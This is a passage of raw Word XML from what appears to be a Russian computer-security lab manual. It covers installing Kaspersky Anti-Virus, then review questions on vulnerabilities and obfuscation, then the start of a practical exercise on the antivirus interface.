        <w:t>С:\Windows\system32</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этой лабораторной работе оставьте отмеченным только флаг проверки объектов автозапуска и нажмите </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Далее</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3436620" cy="2705100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="87" name="Рисунок 87" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/11/2-30.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId203" r:link="rId204">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3436620" cy="27051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b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивирус Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> позволяет поставить защиту паролем на ряд операций: изменения настроек, выгрузки антивируса или остановки работы компонентов и задач поиска вирусов. Если такая защита установлена, то при попытке совершить защищенную операцию будет предложено ввести пароль. Это может быть полезно, если компьютер используется несколькими пользов</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">телями и кому-то из них нельзя доверять. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">В этой лабораторной работе устанавливать пароли не нужно, поэтому оставьте флаг </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Включить защиту паролем</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> пустым и нажмите </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Далее</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3604260" cy="2834640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="88" name="Рисунок 88" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/11/2-31.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId205" r:link="rId206">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3604260" cy="283464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На последнем этапе </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Мастер настройки</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> проводит анализ Вашей с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стемы и собирает данные об установленных программах. В дальнейшем эта информация пригодится для контроля целостности приложений, дополнител</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ного компонента антивирусной защиты.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Дождитесь окончания сбора сведений о системе</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3985260" cy="3116580"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="89" name="Рисунок 89" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/11/2-32.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId207" r:link="rId208">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3985260" cy="311658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Следующее окно информирует, что установка завершена, но треб</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ет перезагрузки. Без перезагрузки установка </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> не м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">жет считаться завершенной. Поэтому убирать отметку с флага </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Перезагрузить компьютер</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> можно только в исключительных случаях. В данном случае это не требуется.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Оставьте отмеченным флаг </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Перезагрузить компьютер</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и нажмите </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Гот</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>во</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008120" cy="3147060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="90" name="Рисунок 90" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/11/2-33.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId209" r:link="rId210">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4008120" cy="314706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Дождитесь завершения перезагрузки компьютера и войдите в с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">стему под своей учетной записью </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Обратите внимание, что после перезагрузки в правом нижнем углу экрана появилось сообщение о необходимости провести полную проверку ко</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">пьютера на вирусы. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2842260" cy="1295400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="91" name="Рисунок 91" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/11/2-34.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId211" r:link="rId212">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2842260" cy="1295400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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2C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>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Pr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>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D70D0E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Какие действия необходимо провести перед установкой Антивируса Касперского на Ваш компьютер? Перечислите их.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Расскажите порядок установки и активации Антивируса Касперск</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>го.</w:t>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D70D0E">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Какие технологии используются для организации Интернет атак в наши дни?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Назовите типы программных уязвимостей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>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Pr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Что такое обфускация и для чего она используются?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Какие действия необходимо предпринять для защиты системы , с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>держащей уязвимость, от несанкционированного проникновения?</w:t>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D70D0E">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Возможно ли обеспечить100% защиту системы пользователя от действия вредоносных программ?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="161" w:name="_Toc3811353"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t xml:space="preserve"> работ</w:t>
      </w:r>
      <w:r>
        <w:t>а 24</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>. Работа с Антивирусом Касперского</w:t>
      </w:r>
      <w:bookmarkEnd w:id="161"/>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b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Цель работы:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Эта </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Практическая</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> работа посвящена изучению интерфейса </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, отвечающему за взаимодействие с пользователем</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>См. ЛР 6.</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62" w:name="_Toc3811354"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Задание:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="162"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="163" w:name="_Toc3811355"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Изучить внешний вид всех четырех основных окон интерфейса, получить знания о механизме управления основными задачами проверки на наличие в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>русов (постоянная защита и поиск вирусов) и обновления.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="163"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="164" w:name="_Toc3811356"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Порядок выполнения работы:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="164"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>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65" w:name="_Toc3811357"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Включить компьютер (при загрузке выбрать пункт 4);</w:t>
      </w:r>
      <w:bookmarkEnd w:id="165"/>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66" w:name="_Toc3811358"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Запустить программу Microsoft Virtual PC;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="166"/>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67" w:name="_Toc3811359"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Загрузить образ ОС Microsoft Windows XP;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167"/>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68" w:name="_Toc3811360"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Выполнить задания.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="168"/>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69" w:name="_Toc3811361"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Задание 1. Изучение интерфейса</w:t>
      </w:r>
      <w:bookmarkEnd w:id="169"/>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этом задании изучается интерфейс </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Факт</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
